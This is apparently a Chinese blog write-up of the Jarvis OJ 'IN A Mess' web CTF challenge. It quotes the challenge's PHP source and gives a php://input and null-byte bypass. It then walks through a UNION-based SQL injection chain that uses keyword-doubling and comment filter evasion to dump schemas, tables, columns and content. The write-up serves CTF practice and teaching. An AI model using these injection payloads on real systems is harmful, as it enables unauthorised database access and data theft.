jarvis oj web writeup

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/qq_20307987/article/details/80046394

IN A Mess
tips: index.phps

error_reporting(0);
echo "<!--index.phps-->";
if (!$_GET['id']) {
    header('Location: index.php?id=1');
    exit();
}
$id = $_GET['id'];
$a = $_GET['a'];
$b = $_GET['b'];
if (stripos($a, '.')) {
    echo 'Hahahahahaha';
    return;
}
$data = @file_get_contents($a, 'r');
if ($data == "1112 is a nice lab!" and $id == 0 and strlen($b) > 5 and eregi("111" . substr($b, 0, 1), "1114") and substr($b, 0, 1) != 4) {
    require ("flag.txt");
} else {
    print "work harder!harder!harder!";
}

POST
/index.php?id=.&a=php://input&b=%0012345 
1112 is a nice lab!
id=0 is wrong ....

得到下一关的地址

Come ON!!! {/^HT2mCpcvOLf}

//查显示位：得到3
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*111*/ununionion/*111*/seselectlect/*111*/1,2,3#
//暴库：得到test
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*111*/ununionion/*111*/seselectlect/*111*/1,2,group_concat(schema_name)/*111*/frfromom/*111*/information_schema.schemata#
//爆表：得到content
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*111*/ununionion/*111*/seselectlect/*111*/1,2,group_concat(table_name)/*111*/frfromom/*111*/information_schema.tables/*111*/where/*111*/table_schema=0x74657374
//爆字段：得到id,context,title
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*111*/ununionion/*111*/seselectlect/*111*/1,2,group_concat(column_name)/*111*/frfromom/*111*/information_schema.columns/*111*/where/*111*/table_name=0x636f6e74656e74
//爆内容：
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*111*/ununionion/*111*/seselectlect/*111*/1,2,group_concat(context)/*111*/frfromom/*111*/test.content#